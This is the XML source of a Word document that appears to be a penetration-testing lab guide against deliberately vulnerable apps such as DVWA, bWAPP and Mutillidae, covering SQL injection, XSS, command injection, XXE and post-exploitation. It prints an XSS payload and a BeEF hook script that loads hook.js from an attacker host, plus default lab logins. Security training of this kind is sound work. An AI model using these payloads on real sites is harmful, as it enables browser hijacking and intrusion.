          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configure Browser Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. In Burp Suite, go to Proxy → Intercept → Turn OFF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Click **"Open Browser"** (Burp's Chromium)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Navigate to: `http://192.168.18.55`</w:t>
      </w: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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6FB00D03" wp14:editId="4FF03150">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="49" name="image41.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image41.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4CA0A267" wp14:editId="4983292D">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="image39.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image39.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00473DE1" w:rsidRPr="00C57BFC" w:rsidRDefault="00473DE1" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00473DE1" w:rsidRPr="00C57BFC" w:rsidRDefault="00473DE1"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lastRenderedPageBreak/>
        <w:t>SQL Injection on DVWA</w:t>
      </w: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1. In Burp's browser, click "Damn Vulnerable Web Application (DVWA)”</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2. Login: `admin` / `password`</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3. Click "SQL Injection" in left menu</w:t>
      </w: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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="47CF826E" wp14:editId="7ECBA30E">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15"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37"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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 xml:space="preserve">XSS Exploitation with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 xml:space="preserve">Install and Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w: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 xml:space="preserve">Access </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> UI:</w:t>
      </w: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Open Firefox</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Go to: http://127.0.0.1:3000/ui/panel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="008C1A3C" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Username: beef</w:t>
      </w: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Exploit XSS on OWASP:</w:t>
      </w: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Navigate to: http://192.168.18.55/bodgeit/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="008C1A3C" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In search box, test XSS:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w: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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="653B3BE8" wp14:editId="2C761BCF">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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38"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3327400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4A159696" wp14:editId="393ECFC9">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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39"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="39B61CF3" wp14:editId="1A816255">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30"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40"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C1A3C" w:rsidRPr="00C57BFC" w:rsidRDefault="008C1A3C" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hook browser to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>="http://192.168.18.59:3000/hook.js"&gt;&lt;/script&gt;</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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="70A6185D" wp14:editId="2F019E8C">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="47" name="image45.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image45.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6C2C36F3" wp14:editId="7744FD2A">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="59" name="image56.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image56.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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Step 4.5: Command Injection</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 xml:space="preserve">On </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bWAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (OWASP):</w:t>
      </w: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 xml:space="preserve">Login to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bWAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: bee / bug</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Select "OS Command Injection"</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In DNS lookup field:</w:t>
      </w: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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2CB11BE3" wp14:editId="21878F09">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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3"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="68870F41" wp14:editId="2061194A">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="56" name="image55.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image55.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3327400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4813FC35" wp14:editId="41BF4C4E">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="51" name="image51.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image51.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="62DF1803" wp14:editId="23A91677">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="43" name="image49.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image49.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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XML External Entity (XXE) Injection</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 xml:space="preserve">On </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> II (OWASP):</w:t>
      </w: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eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Go to OWASP 2013 → A1 Injection → XML Validator</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lastRenderedPageBreak/>
        <w:t>Test basic XXE:</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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="28CF91DF" wp14:editId="3E1BEC28">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="60" name="image48.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image48.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="008C1A3C" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PHASE 5: </w:t>
      </w:r>
      <w:r w:rsidR="00A13DDC" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>POST-EXPLOITATION (Days 7-10)</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Step 5.1: Establish Persistent Access</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 xml:space="preserve">On </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (if you have shell):</w:t>
      </w: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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="503F93B2" wp14:editId="3211F359">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4"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48"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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lastRenderedPageBreak/>
        <w:t>Enumerate System Information</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 xml:space="preserve">Inside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="008C1A3C" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>with active session):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C1A3C" w:rsidRPr="00C57BFC" w:rsidRDefault="008C1A3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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="75B17572" wp14:editId="33F387A2">
